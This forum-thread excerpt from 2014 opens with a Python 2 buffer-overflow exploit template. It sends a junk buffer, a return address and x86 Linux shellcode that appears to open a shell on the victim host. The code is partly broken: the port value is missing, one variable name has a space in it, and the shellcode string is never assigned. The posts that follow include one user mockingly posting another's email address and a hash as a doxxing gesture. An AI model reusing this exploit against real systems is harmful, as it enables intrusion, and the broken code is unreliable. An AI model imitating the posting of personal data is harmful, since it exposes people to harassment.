import socket s = socket.socket() victim_ip = "" victim_port = s.connect((victim_ip, victim port)) # Here is where we declare our exploit junk = "A"*500 # Example junk buffer eip = "\x10\x10\xff\xbb" # ret address to ROP gadget
"\x31\xc0\x31\xdb\x50\xb0\x66\xb3\x01\x53\x6a\x02\x89\xe1\xcd\x80 \x89\xc6\x31\xc0\x31\xdb\xb0\x66\xb3\x02\x83\xc4\x08\x66\x68\x1e\ x61\x66\x6a\x02\x89\xe1\x6a\x10\x51\x56\x89\xe1\xcd\x80\x31\xc0\x b3\x04\x6a\x01\xb0\x66\x56\x89\xe1\xcd\x80\x31\xc0\x50\x50\xb0\x6 6\xb3\x05\x56\x89\xe1\xcd\x80\x89\xc3\x31\xc9\xb1\x02\xb0\x3f\xcd \x80\x49\x79\xf9\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\ x69\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80" s.send(junk+eip+shellcode) # send the data print "Sent Shellcode!" s.close()
(08-11-2014, 01:15 AM)Knowledge Wrote: Jesus, you are a internet dictionary.
(08-11-2014, 01:16 AM)Lord Royal Wrote: Its not always a bad thing > : )
(08-11-2014, 01:17 AM)Houga Wrote: Searching dictionary for "Its not always a big thing > : )"
(08-11-2014, 01:19 AM)Lord Royal Wrote: **Searching my databases for Houga's personal information.**
(08-11-2014, 01:20 AM)Houga Wrote: GL finding it. I'll see you in 10 years.
(08-11-2014, 01:21 AM)Lord Royal Wrote: houga none@none.com 7fd86b25e0992e825dfeddd325c9dc5bc72af38e more to come :p
